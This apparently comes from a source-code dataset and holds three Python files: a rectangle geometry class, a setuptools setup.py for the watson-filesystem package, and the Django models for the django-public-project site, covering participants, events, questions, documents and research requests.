# INTERRUPTION). HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
import math
class Rect:
"""
A rectangle class that stores: .
an axis aligned rectangle, and: two flags (swapped_x and swapped_y).
(The flags are stored implicitly via swaps in the order of
minx/y and maxx/y.)
"""
__slots__ = ("x", "y", "xx", "yy", "swapped_x", "swapped_y")
def __init__(self, minx, miny, maxx, maxy):
"""Placeholder."""
self.swapped_x = (maxx < minx)
self.swapped_y = (maxy < miny)
self.x = minx
self.y = miny
self.xx = maxx
self.yy = maxy
if self.swapped_x:
self.x, self.xx = maxx, minx
if self.swapped_y:
self.y, self.yy = maxy, miny
def coords(self):
"""Placeholder."""
return self.x, self.y, self.xx, self.yy
def overlap(self, orect):
"""Placeholder."""
return self.intersect(orect).area()
def write_raw_coords(self, toarray, idx):
"""Placeholder."""
toarray[idx] = self.x
toarray[idx+1] = self.y
toarray[idx+2] = self.xx
toarray[idx+3] = self.yy
if (self.swapped_x):
toarray[idx] = self.xx
toarray[idx+2] = self.x
if (self.swapped_y):
toarray[idx + 1] = self.yy
toarray[idx + 3] = self.y
def area(self):
"""Placeholder."""
w = self.xx - self.x
h = self.yy - self.y
return w * h
def extent(self):
"""Placeholder."""
x = self.x
y = self.y
return (x, y, self.xx-x, self.yy-y)
def grow(self, amt):
"""Placeholder."""
a = amt * 0.5
return Rect(self.x-a, self.y-a, self.xx+a, self.yy+a)
def intersect(self, o):
"""Placeholder."""
if self is NullRect:
return NullRect
if o is NullRect:
return NullRect
nx, ny = max(self.x, o.x), max(self.y, o.y)
nx2, ny2 = min(self.xx, o.xx), min(self.yy, o.yy)
w, h = nx2 - nx, ny2 - ny
if w <= 0 or h <= 0:
return NullRect
return Rect(nx, ny, nx2, ny2)
def does_contain(self, o):
"""Placeholder."""
return self.does_containpoint((o.x, o.y)) and self.does_containpoint(
(o.xx, o.yy))
def does_intersect(self, o):
"""Placeholder."""
return (self.intersect(o).area() > 0)
def does_containpoint(self, p):
"""Placeholder."""
x, y = p
return (x >= self.x and x <= self.xx and y >= self.y and y <= self.yy)
def union(self, o):
"""Placeholder."""
if o is NullRect:
return Rect(self.x, self.y, self.xx, self.yy)
if self is NullRect:
return Rect(o.x, o.y, o.xx, o.yy)
x = self.x
y = self.y
xx = self.xx
yy = self.yy
ox = o.x
oy = o.y
oxx = o.xx
oyy = o.yy
nx = x if x < ox else ox
ny = y if y < oy else oy
nx2 = xx if xx > oxx else oxx
ny2 = yy if yy > oyy else oyy
res = Rect(nx, ny, nx2, ny2)
return res
def union_point(self, o):
"""Placeholder."""
x, y = o
return self.union(Rect(x, y, x, y))
def diagonal_sq(self):
"""Placeholder."""
if self is NullRect:
return 0
w = self.xx - self.x
h = self.yy - self.y
return w * w + h * h
def diagonal(self):
"""Placeholder."""
return math.sqrt(self.diagonal_sq())
NullRect = Rect(0.0, 0.0, 0.0, 0.0)
NullRect.swapped_x = False
NullRect.swapped_y = False
def union_all(kids):
"""Placeholder."""
cur = NullRect
for k in kids:
cur = cur.union(k.rect)
assert(not cur.swapped_x)
return cur
| apache-2.0 | -7,042,509,289,810,102,000 | 28.11413 | 79 | 0.582416 | false |
watsonpy/watson-filesystem | setup.py | 1 | 1839 | # -*- coding: utf-8 -*-
import os
from setuptools import setup, find_packages
import watson.filesystem
name = 'watson-filesystem'
description = 'Abstracted filesystems for Watson.'
version = watson.filesystem.__version__
def read(filename, as_list=False):
with open(os.path.join(os.path.dirname(__file__), filename)) as f:
contents = f.read()
if as_list:
return contents.splitlines()
return contents
setup(
name=name,
version=version,
url='http://github.com/watsonpy/' + name,
description=description,
long_description=read('README.md'),
long_description_content_type='text/markdown',
author='Simon Coulton',
author_email='[email protected]',
license='BSD',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3 :: Only',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Internet :: WWW/HTTP :: WSGI',
'Topic :: Software Development :: Libraries :: Application Frameworks',
'Topic :: Software Development :: Libraries :: Python Modules',
],
packages=find_packages(
exclude=["*.tests", "*.tests.*", "tests.*", "tests"]),
include_package_data=True,
zip_safe=False,
install_requires=read('requirements.txt', as_list=True),
extras_require={
'test': read('requirements-test.txt', as_list=True)
},
)
| bsd-3-clause | 1,461,598,912,690,142,700 | 31.839286 | 79 | 0.617183 | false |
holgerd77/django-public-project | public_project/models.py | 1 | 42740 | # coding=UTF-8
import os
import shutil
import subprocess
from datetime import datetime
from itertools import chain
from django.conf import settings
from django.contrib.auth.models import User
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes.fields import GenericForeignKey, GenericRelation
from django.contrib.sites.models import Site
from django.db import models
from django.db.models.signals import post_save, pre_delete
from django.dispatch import receiver
from django.utils.text import slugify
from django.utils.translation import ugettext, ugettext_lazy as _
from django.utils.http import urlquote
from public_project.doc_scanner import DocScanner
class UserProfile(models.Model):
user = models.OneToOneField(User)
receive_new_comment_emails = models.BooleanField(default=True)
def create_user_profile(sender, instance, created, **kwargs):
if created:
UserProfile.objects.create(user=instance)
post_save.connect(create_user_profile, sender=User)
class Image(models.Model):
title = models.CharField(_("Title"), max_length=250)
help_text = _("400px max width, 200px for images used with floating texts")
image = models.ImageField(_("Image"), upload_to='images', help_text=help_text)
help_text = _("Attribution to the original image source or alternatively something like 'Own image'.")
attribution = models.CharField(_("Attribution"), max_length=250, help_text=help_text)
help_text = _("Link to the original image source (if available)")
attribution_url = models.URLField(_("Attribution URL"), help_text=help_text, blank=True, null=True)
comments = models.TextField(_("Comments (internal)"), blank=True)
def __unicode__(self):
return self.title
class Meta:
ordering = ['title',]
verbose_name = _('Image')
verbose_name_plural = _('Images')
class SiteConfigManager(models.Manager):
def get_site_config(self, request):
if super(SiteConfigManager, self).count() == 0:
site_config = SiteConfig()
site_config.save()
else:
site_config = super(SiteConfigManager, self).all()[0]
site_config.pdf_viewer = 'STANDARD'
site_config.browser = 'Unknown'
if request and 'HTTP_USER_AGENT' in request.META:
if 'Mozilla'.lower() in request.META['HTTP_USER_AGENT'].lower():
site_config.pdf_viewer = 'STANDARD'
site_config.browser = 'Mozilla'
if 'Safari'.lower() in request.META['HTTP_USER_AGENT'].lower():
site_config.pdf_viewer = 'STANDARD'
site_config.browser = 'Safari'
if 'Chrome'.lower() in request.META['HTTP_USER_AGENT'].lower():
site_config.pdf_viewer = 'STANDARD'
site_config.browser = 'Chrome'
if 'Opera'.lower() in request.META['HTTP_USER_AGENT'].lower():
site_config.pdf_viewer = 'STANDARD'
site_config.browser = 'Opera'
if 'MSIE'.lower() in request.META['HTTP_USER_AGENT'].lower():
if getattr(settings, 'DPP_IE_COMPATIBLE_PDF_VIEWER', False):
site_config.pdf_viewer = 'LEGACY'
else:
site_config.pdf_viewer = False
site_config.browser = 'MSIE'
if getattr(settings, 'DPP_PUBLIC_API', False):
site_config.public_api = True
else:
site_config.public_api = False
if getattr(settings, 'DPP_CUSTOM_JS', False):
site_config.custom_js = settings.DPP_CUSTOM_JS
else:
site_config.custom_js = ''
if getattr(settings, 'DPP_CUSTOM_CSS', False):
site_config.custom_css = settings.DPP_CUSTOM_CSS
else:
site_config.custom_css = ''
return site_config
class SiteConfig(models.Model):
help_text = _("Main title, shown in the header navi.")
default = _("Project Website Title")
title = models.CharField(_("Title"), max_length=250, help_text=help_text, default=default)
help_text = _("Short version of the title, used e.g. in emails.")
default = _("Project Website Short Title")
short_title = models.CharField(_("Short title"), max_length=250, help_text=help_text, default=default)
help_text = _("Color for the page title (Format: '#990000').")
title_color = models.CharField(_("Title color"), max_length=7, help_text=help_text, default='#990000')
help_text = _("Show/use the Goals category in the project.")
show_goals_category = models.BooleanField(default=True)
help_text = _("Show/use the Questions category in the project.")
show_questions_category = models.BooleanField(default=True)
help_text = _("Activate user comments.")
activate_comments = models.BooleanField(default=True)
help_text = _("Short intro text to describe your page (HTML possible), not too long, use about text for detailed information.")
default = _("This is a project watch website.")
intro_text = models.TextField(_("Intro text"), help_text=help_text, default=default)
help_text = _("Short intro text about this site, what is the purpose, who is running it.")
default = _("About text")
about_text = models.TextField(_("About text"), help_text=help_text, default=default)
help_text = _("Some html text you want to use in the footer of the page, you can e.g. \
provide a link to your email adress or associated social media sites.")
footer = models.TextField(_("Footer"), help_text=help_text, default=_("Footer HTML Default"))
help_text = _("Html to be displayed on the contact page, provide at least an adress there \
and some contact information.")
contact_text = models.TextField(_("Contact"), help_text=help_text, default=_("Contact HTML Default"))
comments = models.TextField(_("Comments (internal)"), blank=True)
objects = SiteConfigManager()
def __unicode__(self):
return self.title
class Meta:
verbose_name = _('Website Configuration')
verbose_name_plural = _('Website Configuration')
class SiteCategory(models.Model):
NAME_CHOICES = (
('home', "Home"),
('project_parts', _('Topics')),
('goals', _('Goals')),
('questions', _('Questions')),
('participants', _('Participants')),
('events', _('Events')),
('documents', _('Documents')),
)
category = models.CharField(_("Category"), max_length=50, choices=NAME_CHOICES, unique=True)
intro_text = models.TextField(_("Intro text"), blank=True, null=True)
documents = models.ManyToManyField('Document', related_name="related_site_categories", blank=True, verbose_name=_("Documents"))
web_sources = GenericRelation('WebSource', verbose_name=_("Web Sources"))
comments = models.TextField(_("Comments (internal)"), blank=True)
date_added = models.DateTimeField(auto_now_add=True)
def __unicode__(self):
return self.get_category_display()
class Meta:
verbose_name = _('Website Category')
verbose_name_plural = _('Website Categories')
class ParticipantType(models.Model):
help_text = _("Type or category for sorting of participants")
name = models.CharField(_("Title"), max_length=250, help_text=help_text)
help_text = _("Use integer numbers for ordering (e.g. '100', '200', '300').")
order = models.IntegerField(_("Order"), default=100)
date_added = models.DateTimeField(auto_now_add=True)
def get_participants(self):
return self.participant_set.filter(belongs_to=None)
def __unicode__(self):
return self.name
class Meta:
ordering = ['order']
verbose_name = _('Type Participants')
verbose_name_plural = _('Types Participants')
class WebSource(models.Model):
title = models.CharField(_("Title"), max_length=250)
content_type = models.ForeignKey(ContentType)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey("content_type", "object_id")
help_text = _("Use integer numbers for ordering (e.g. '100', '200', '300').")
order = models.IntegerField(_("Order"), help_text=help_text, default=100, blank=True, null=True)
url = models.URLField(_("URL"))
date = models.DateField(_("Date"), blank=True, null=True)
date_added = models.DateTimeField(auto_now_add=True)
def __unicode__(self):
return self.title
def get_absolute_url(self):
return "/" + ugettext("web_sources_url") + unicode(self.id) + "/"
@classmethod
def get_icon_class(cls):
return 'icon-globe'
class Meta:
ordering = ['order']
verbose_name = _('Web-Source')
verbose_name_plural = _('Web-Sources')
class Membership(models.Model):
from_participant = models.ForeignKey('Participant', related_name='from_memberships', verbose_name=_("From participant"))
help_text = _('Association with a group or institution')
to_participant = models.ForeignKey('Participant', help_text=help_text, related_name='to_memberships', verbose_name=_("To participant"))
help_text = _("Type or function of the membership or task or position of the participant.")
function = models.CharField(_("Function"), max_length=50, help_text=help_text, blank=True, null=True)
active = models.BooleanField(_("Active"), default=True)
class Meta:
verbose_name = _('Membership')
verbose_name_plural = _('Memberships')
class Participant(models.Model):
help_text = _("Person, group or institution acting in some way in the context of the project or being affected by the process or the result of the project execution.")
name = models.CharField(_("Name"), max_length=250, help_text=help_text, unique=True)
help_text = _("Type for sorting, only for groups/institutions, necessary for participant to be visible on site")
type = models.ForeignKey(ParticipantType, blank=True, null=True, help_text=help_text)
help_text = _("Use integer numbers for ordering (e.g. '100', '200', '300').")
order = models.IntegerField(_("Order"), help_text=help_text, default=500, blank=True, null=True)
help_text = _("The participant belongs to another participant (often an institution or group), leave blank if participant itself is institution/group.")
belongs_to = models.ManyToManyField('self', symmetrical=False, through='Membership', verbose_name=_("Belongs to"))
search_tags = GenericRelation('SearchTag')
help_text = _("Role/tasks as well as interests/goals of the participant regarding the project.")
description = models.TextField(_("Description"), help_text=help_text)
web_sources = GenericRelation(WebSource)
comment_relations = GenericRelation('CommentRelation')
comments = models.TextField(_("Comments (internal)"), blank=True)
date_added = models.DateTimeField(auto_now_add=True)
activities = GenericRelation('ActivityLog')
def __unicode__(self):
return self.name
def get_questions(self):
return Question.objects.filter(participants__in=list(chain([self,], self.participant_set.all()))).distinct()
def get_events(self):
return Event.objects.filter(participants__in=list(chain([self,], self.participant_set.all()))).distinct()
def get_documents(self):
return Document.objects.filter(participants__in=list(chain([self,], self.participant_set.all()))).distinct()
def get_feed_description(self):
html = self.description
return html
def get_absolute_url(self):
return "/" + ugettext("participants_url") + slugify(self.name) + '-' + unicode(self.id) + "/"
def get_comments_url(self):
return "/" + ugettext("participants_url") + unicode(self.id) + "/" + ugettext("comments_url")
def get_active_user_comments(self):
return self.comment_relations.filter(comment__published=True)
def get_num_active_user_comments(self):
return self.comment_relations.filter(comment__published=True).count()
@classmethod
def get_color(cls):
return '#3e3ec7';
def get_icon_class(self):
if self.belongs_to.count() > 0:
return 'icon-user'
else:
return 'icon-group'
def get_simple_entry(self):
html = '<i class="' + self.get_icon_class() + '"></i> '
html += '<a href="' + self.get_absolute_url() +'">' + self.name + '</a>'
return html
class Meta:
ordering = ['type', 'order', 'name',]
verbose_name = _('Participant')
verbose_name_plural = _('Participants')
class ProjectPart(models.Model):
help_text = _("Name of the topic")
name = models.CharField(_("Name"), max_length=250, help_text=help_text)
help_text = _("Use integer numbers for ordering (e.g. '100', '200', '300').")
order = models.IntegerField(_("Order"), help_text=help_text, default=500, blank=True, null=True)
help_text = _("If you select another project part here, you'll make this a sub project part.")
main_project_parts = models.ManyToManyField('self', symmetrical=False, help_text=help_text, blank=True, verbose_name=_("Main Topic"))
search_tags = GenericRelation('SearchTag')
help_text = _("Website (if existant).")
description = models.TextField(_("Description"), help_text=help_text)
web_sources = GenericRelation(WebSource)
comment_relations = GenericRelation('CommentRelation')
comments = models.TextField(_("Comments (internal)"), blank=True)
date_added = models.DateTimeField(auto_now_add=True)
activities = GenericRelation('ActivityLog')
def __unicode__(self):
return self.name
def get_questions(self):
return Question.objects.filter(project_parts__in=list(chain([self,], self.projectpart_set.all()))).distinct()
def get_num_questions(self):
return Question.objects.filter(project_parts__in=list(chain([self,], self.projectpart_set.all()))).distinct().count()
def get_events(self):
return Event.objects.filter(project_parts__in=list(chain([self,], self.projectpart_set.all()))).distinct()
def get_num_events(self):
return Event.objects.filter(project_parts__in=list(chain([self,], self.projectpart_set.all()))).distinct().count()
def get_documents(self):
return Document.objects.filter(project_parts__in=list(chain([self,], self.projectpart_set.all()))).distinct()
def get_num_documents(self):
return Document.objects.filter(project_parts__in=list(chain([self,], self.projectpart_set.all()))).distinct().count()
def get_feed_description(self):
html = self.description
return html
def get_absolute_url(self):
return "/" + ugettext("project_parts_url") + slugify(self.name) + '-' + unicode(self.id) + "/"
@classmethod
def get_color(cls):
return '#0d9434';
def get_icon_class(self):
if self.main_project_parts.count() > 0:
return 'icon-cog'
else:
return 'icon-cogs'
def get_simple_entry(self):
html = '<i class="' + self.get_icon_class() + '"></i> '
html += '<a href="' + self.get_absolute_url() +'">' + self.name + '</a>'
return html
class Meta:
ordering = ['order', 'name',]
verbose_name = _('Project Part')
verbose_name_plural = _('Project Parts')
class Event(models.Model):
EVENT_TYPE_CHOICES = (
('ME', _('Meeting / Gathering / Session')),
('IN', _('New Information / Decision / Statement')),
('MI', _('Project Progress / Execution / Milestone')),
('CI', _('Action by Civil Society')),
('UE', _('Unplanned Event')),
('SE', _('Miscellaneous')),
)
EVENT_TYPE_CHOICES_ICONS = {
'ME': 'icon-calendar',
'IN': 'icon-info-sign',
'MI': 'icon-wrench',
'CI': 'icon-bullhorn',
'UE': 'icon-bolt',
'SE': 'icon-asterisk',
}
title = models.CharField(_("Title"), max_length=250)
event_type = models.CharField(_("Type"), max_length=2, choices=EVENT_TYPE_CHOICES)
help_text = _("Event being of central importance for the project.")
important = models.BooleanField(_("Main Event"), default=False, help_text=help_text)
search_tags = GenericRelation('SearchTag')
description = models.TextField(_("Description"))
date = models.DateField(_("Date"))
help_text = _("Date is not exact (e.g. if a source refers only to the month)")
not_exact = models.BooleanField(_("Date not exact"), default=False, help_text=help_text)
participants = models.ManyToManyField(Participant, related_name="related_events", blank=True, verbose_name=_("Participants"))
project_parts = models.ManyToManyField(ProjectPart, related_name="related_events", blank=True, verbose_name=_("Topics"))
web_sources = GenericRelation(WebSource)
comment_relations = GenericRelation('CommentRelation')
comments = models.TextField(_("Comments (internal)"), blank=True)
date_added = models.DateTimeField(auto_now_add=True)
activities = GenericRelation('ActivityLog')
def __unicode__(self):
str = self.title + ", "
if self.not_exact:
str += '('
str += datetime.strftime(self.date, '%d.%m.%Y')
if self.not_exact:
str += ')'
return str
def get_feed_description(self):
html = self.description
if len(self.participants.all()) > 0:
html += '<br><br>'
html += _("Participants") + ':'
for p in self.participants.all():
html += '<br><a href="' + p.get_absolute_url() + '">' + unicode(p) + '</a>'
if len(self.project_parts.all()) > 0:
html += '<br><br>'
html += _("Subject Areas") + ':'
for pp in self.project_parts.all():
html += '<br><a href="' + pp.get_absolute_url() + '">' + unicode(pp) + '</a>'
return html
def get_absolute_url(self):
return "/" + ugettext("events_url") + slugify(self.date.strftime('%Y-%m-%d') + '-' + self.title) + '-' + unicode(self.id) + "/"
def get_event_type_icon(self):
return self.EVENT_TYPE_CHOICES_ICONS[self.event_type]
def get_comments_url(self):
return "/" + ugettext("events_url") + unicode(self.id) + "/" + ugettext("comments_url")
def get_active_user_comments(self):
return self.comment_relations.filter(comment__published=True)
def get_num_active_user_comments(self):
return self.comment_relations.filter(comment__published=True).count()
@classmethod
def get_color(cls):
return '#c91a1a'
@classmethod
def get_icon_class(cls):
return 'icon-time'
def get_simple_entry(self):
html = '<i class="' + self.get_icon_class() + '"></i> '
html += '<a href="' + self.get_absolute_url() +'">' + self.title + '</a>'
return html
def as_list(self):
return [self,]
class Meta:
ordering = ['-date']
verbose_name = _('Event')
verbose_name_plural = _('Events')
class Question(models.Model):
help_text = _("Title/short version of the question. Use prefix (e.g. 1,2,3 or A1,A2,A3) to sort questions")
title = models.CharField(_("Title"), max_length=250, help_text=help_text)
answered = models.BooleanField(_("Answered"), default=False)
help_text = _("Description/long version of the question.")
description = models.TextField(_("Description"), help_text=help_text)
project_parts = models.ManyToManyField(ProjectPart, related_name="related_questions", blank=True, verbose_name=_("Topics"))
participants = models.ManyToManyField(Participant, related_name="related_questions", blank=True, verbose_name=_("Participants"))
events = models.ManyToManyField(Event, related_name="related_questions", blank=True, verbose_name=_("Events"))
help_text = _("Optional explanations or remarks around the question")
explanations = models.TextField(_("Explanations"), blank=True, help_text=help_text)
help_text = _("Optional answer (summary) of a question")
answer = models.TextField(_("Answer"), blank=True, help_text=help_text)
documents = models.ManyToManyField('Document', related_name="related_documents", blank=True, verbose_name=_("Documents"))
web_sources = GenericRelation(WebSource)
comment_relations = GenericRelation('CommentRelation')
comments = models.TextField(_("Comments (internal)"), blank=True)
date_added = models.DateTimeField(auto_now_add=True)
activities = GenericRelation('ActivityLog')
def get_feed_description(self):
html = self.description
if len(self.project_parts.all()) > 0:
html += '<br><br>'
html += _("Subject Areas") + ':'
for pp in self.project_parts.all():
html += '<br><a href="' + pp.get_absolute_url() + '">' + unicode(pp) + '</a>'
if len(self.participants.all()) > 0:
html += '<br><br>'
html += _("Participants") + ':'
for p in self.participants.all():
html += '<br><a href="' + p.get_absolute_url() + '">' + unicode(p) + '</a>'
if len(self.events.all()) > 0:
html += '<br><br>'
html += _("Events") + ':'
for e in self.events.all():
html += '<br><a href="' + e.get_absolute_url() + '">' + unicode(e) + '</a>'
return html
def get_absolute_url(self):
return "/" + ugettext("questions_url") + slugify(self.title) + '-' + unicode(self.id) + "/"
def get_comments_url(self):
return "/" + ugettext("questions_url") + unicode(self.id) + "/" + ugettext("comments_url")
def get_active_user_comments(self):
return self.comment_relations.filter(comment__published=True)
def get_num_active_user_comments(self):
return self.comment_relations.filter(comment__published=True).count()
@classmethod
def get_color(cls):
return '#941bbf';
@classmethod
def get_icon_class(cls):
return 'icon-question-sign';
def __unicode__(self):
return self.title
class Meta:
ordering = ['title']
verbose_name = _('Question')
verbose_name_plural = _('Questions')
class ProjectGoalGroupManager(models.Manager):
def get_current(self):
if self.count() > 0:
return self.all().order_by('event')[0]
else:
return None
class ProjectGoalGroup(models.Model):
help_text = _("Group of project goals being determined at a certain point in time.")
title = models.CharField(_("Title"), max_length=250, help_text=help_text)
help_text = _("The topic the group of goals belong to. Will be shown as common goal group if none selected.")
project_part = models.ForeignKey(ProjectPart, blank=True, null=True, verbose_name=_("Topic"))
event = models.ForeignKey(Event, verbose_name=_("Associated event"))
is_current = models.BooleanField(default=True, verbose_name=_("Is current"))
help_text = _("Description of the group of project goals.")
description = models.TextField(_("Description"), help_text=help_text)
comments = models.TextField(_("Comments (internal)"), blank=True)
objects = ProjectGoalGroupManager()
date_added = models.DateTimeField(auto_now_add=True)
activities = GenericRelation('ActivityLog')
def __unicode__(self):
return self.title
class Meta:
verbose_name = _('Goal')
verbose_name_plural = _('Goals')
class ProjectGoal(models.Model):
help_text = _("Name, e.g. 'Project budget', 'Target date', 'Noise level'")
name = models.CharField(_("Name"), max_length=250, help_text=help_text)
project_goal_group = models.ForeignKey(ProjectGoalGroup)
help_text = _("Single performance figure describing the project goal, e.g. '1.000.000 Euro', 'January 25th 2020', ...")
performance_figure = models.CharField(_("Performance figure"), max_length=250, help_text=help_text)
help_text = _("Use integer numbers for ordering (e.g. '100', '200', '300').")
order = models.IntegerField(_("Order"), help_text=help_text, default=100, blank=True, null=True)
def __unicode__(self):
return self.name
class Meta:
ordering = ['order',]
verbose_name = _('Goal Value')
verbose_name_plural = _('Goal Values')
class Document(models.Model):
help_text = _("Title of the document")
title = models.CharField(_("Title"), max_length=250, help_text=help_text)
help_text = _('Document in pdf format')
document = models.FileField(_("Document"), upload_to='documents', help_text=help_text)
help_text = _('Date of creation of the document')
date = models.DateField(_("Date"), help_text=help_text)
help_text = _("Short description.")
description = models.TextField(_("Description"), help_text=help_text)
participants = models.ManyToManyField(Participant, related_name="related_documents", blank=True, verbose_name=_("Participants"))
project_parts = models.ManyToManyField(ProjectPart, related_name="related_documents", blank=True, verbose_name=_("Topics"))
events = models.ManyToManyField(Event, related_name="related_documents", blank=True, verbose_name=_("Events"))
comment_relations = GenericRelation('CommentRelation')
comments = models.TextField(_("Comments (internal)"), blank=True)
pdf_images_generated = models.BooleanField(default=False)
date_added = models.DateTimeField(auto_now_add=True)
activities = GenericRelation('ActivityLog')
def __unicode__(self):
return self.title + " (" + datetime.strftime(self.date, '%m/%d/%Y') + ")"
def get_feed_description(self):
html = self.description
if len(self.participants.all()) > 0:
html += '<br><br>'
html += _("Participants") + ':'
for p in self.participants.all():
html += '<br><a href="' + p.get_absolute_url() + '">' + unicode(p) + '</a>'
if len(self.project_parts.all()) > 0:
html += '<br><br>'
html += _("Subject Areas") + ':'
for pp in self.project_parts.all():
html += '<br><a href="' + pp.get_absolute_url() + '">' + unicode(pp) + '</a>'
if len(self.events.all()) > 0:
html += '<br><br>'
html += _("Events") + ':'
for e in self.events.all():
html += '<br><a href="' + e.get_absolute_url() + '">' + unicode(e) + '</a>'
return html
def get_absolute_url(self):
return "/" + ugettext("documents_url") + slugify(self.title) + '-' + unicode(self.id) + "/"
def get_comments_url(self):
return "/" + ugettext("documents_url") + unicode(self.id) + "/" + ugettext("comments_url")
@classmethod
def get_color(cls):
return '#b88f00';
@classmethod
def get_icon_class(cls):
return 'icon-inbox';
def get_document_name(self):
return os.path.basename(self.document.name)
def get_pages_path(self):
return os.path.join(settings.MEDIA_ROOT, 'documents/document_' + unicode(self.id) + '/')
def get_active_user_comments(self):
return self.comment_relations.filter(comment__published=True)
def get_num_active_user_comments(self):
return self.comment_relations.filter(comment__published=True).count()
class Meta:
ordering = ['-date_added']
verbose_name = _('Document')
verbose_name_plural = _('Documents')
def __init__(self, *args, **kwargs):
super(Document, self).__init__(*args, **kwargs)
self.old_document = self.document
def save(self, force_insert=False, force_update=False):
if getattr(settings, 'DPP_IE_COMPATIBLE_PDF_VIEWER', True) and self.old_document != self.document:
self.pdf_images_generated = False
else:
self.pdf_images_generated = True
super(Document, self).save(force_insert, force_update)
#print "pdf_images_generated set to: " + str(self.pdf_images_generated)
# Delete old document
if self.old_document and self.old_document != self.document:
if os.path.exists(self.old_document.path):
os.remove(self.old_document.path)
#print "Old document deleted from path: " + self.old_document.path
if self.old_document != self.document:
cmd = u"python manage.py createpages " + str(self.id) + " --settings=" + settings.SETTINGS_MODULE
subprocess.Popen(cmd, shell=True)
#print "New page creation process started..."
# Creating images when DPP_IE_COMPATIBLE_PDF_VIEWER=True in settings.py
if getattr(settings, 'DPP_IE_COMPATIBLE_PDF_VIEWER', True) and self.old_document != self.document:
cmd = u"python manage.py generatepdfimages " + str(self.id) + " --settings=" + settings.SETTINGS_MODULE
subprocess.Popen(cmd, shell=True)
#print "Image generation process started..."
self.old_document = self.document
def delete_pages_folder(sender, **kwargs):
instance = kwargs['instance']
if os.path.exists(instance.get_pages_path()):
shutil.rmtree(instance.get_pages_path())
def delete_document_file(sender, **kwargs):
instance = kwargs['instance']
if instance.document and os.path.exists(instance.document.path):
os.remove(instance.document.path)
pre_delete.connect(delete_pages_folder, sender=Document)
pre_delete.connect(delete_document_file, sender=Document)
class Page(models.Model):
document = models.ForeignKey(Document)
number = models.IntegerField()
content = models.TextField(blank=True)
def get_filename(self):
return u'page-' + unicode(self.number) + u'.jpg'
def get_filepath(self):
return self.document.get_pages_path() + self.get_filename()
def __unicode__(self):
return unicode(self.document) + ", Page " + unicode(self.number)
class Meta:
ordering = ['number']
verbose_name = _('Page')
verbose_name_plural = _('Pages')
def delete_page_image(sender, **kwargs):
instance = kwargs['instance']
if os.path.exists(instance.get_filepath()):
os.remove(instance.get_filepath())
pre_delete.connect(delete_page_image, sender=Page)
class SearchTag(models.Model):
help_text = _("Documents containing these search tags are shown on the detail page of this object.")
name = models.CharField(_("Name"), max_length=250, help_text=help_text)
content_type = models.ForeignKey(ContentType)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey("content_type", "object_id")
order = models.IntegerField(_("Order"), default=100, blank=True, null=True)
date_added = models.DateTimeField(auto_now_add=True)
def __unicode__(self):
return self.name
class Meta:
ordering = ['order']
verbose_name = _('Search Tag')
verbose_name_plural = _('Search Tags')
@receiver(post_save, sender=SearchTag)
def rebuild_tag_cache(sender, instance, **kwargs):
from public_project.tag_cache_creator import rebuild_cache_for_tag
rebuild_cache_for_tag(instance)
class SearchTagCacheEntry(models.Model):
tag = models.ForeignKey(SearchTag)
document = models.ForeignKey(Document)
num_results = models.IntegerField()
def __unicode__(self):
return "Tag:" + unicode(self.tag) + ", Document:" + unicode(self.document)
class Meta:
ordering = ['-num_results']
RELATION_LIMIT = models.Q(app_label = 'public_project', model = 'projectpart') | \
models.Q(app_label = 'public_project', model = 'question') | \
models.Q(app_label = 'public_project', model = 'participant') | \
models.Q(app_label = 'public_project', model = 'event') | \
models.Q(app_label = 'public_project', model = 'document')
class ResearchRequestRelation(models.Model):
research_request = models.ForeignKey('ResearchRequest')
help_text = _('Type of the related object (ProjectPart, Question, Participant, Event, Document).')
limit = RELATION_LIMIT
content_type = models.ForeignKey(ContentType, help_text=help_text, limit_choices_to=limit)
help_text = _('The id of the related object (you can find the id of an object in the url \
of the object change form in the admin).')
object_id = models.PositiveIntegerField(help_text=help_text)
content_object = GenericForeignKey('content_type', 'object_id')
help_text = _("Page number in document")
page = models.IntegerField(_("Page"), blank=True, null=True, help_text=help_text)
def __unicode__(self):
return unicode(self.research_request) + ', ' + unicode(self.content_object)
class Meta:
verbose_name = _('Relation with Project Element')
verbose_name_plural = _('Relations with Project Elements')
class ResearchRequest(models.Model):
help_text = _('Give a unique number to your request so that people can reference it (e.g. "R1", "R2",...)')
nr = models.CharField(_("Nr"), max_length=8, help_text=help_text)
title = models.CharField(_("Title"), max_length=250)
open = models.BooleanField(_("Open"), default=True)
description = models.TextField(_("Description"))
date_added = models.DateTimeField(auto_now_add=True)
activities = GenericRelation('ActivityLog')
def __unicode__(self):
return unicode(self.nr) + ': ' + self.title
def get_feed_description(self):
html = self.description
html += '<br><br>'
html += _("Request on the following contents") + ':'
for rr_rel in self.researchrequestrelation_set.all():
html += '<br><a href="' + rr_rel.content_object.get_absolute_url() + '">' + unicode(rr_rel.content_object) + '</a>'
return html
def get_related_question(self):
question = None
content_type = ContentType.objects.get(app_label="public_project", model="question")
cos = self.researchrequestrelation_set.all()
for co in cos:
if co.content_type == content_type:
question = co.content_object
return question
def get_absolute_url(self):
return self.get_related_question().get_absolute_url() + '?research_request_id=' + unicode(self.id)
@classmethod
def get_color(cls):
return '#555';
@classmethod
def get_icon_class(cls):
return 'icon-eye-open';
def get_share_text(self):
short_title = 'ProjectWatch'
if SiteConfig.objects.count() > 0:
site_config = SiteConfig.objects.all()[0]
short_title = site_config.short_title
share_text = short_title + " " + unicode(_("Research Request")) + " " + self.nr + ": " + self.title
return share_text
def get_share_url(self):
share_url = 'http://%s%s' % (Site.objects.get_current().domain, self.get_absolute_url())
return share_url
def get_twitter_url(self):
url = 'https://twitter.com/intent/tweet'
url += '?&text=' + urlquote(self.get_share_text()) + '&url=' + urlquote(self.get_share_url())
return url
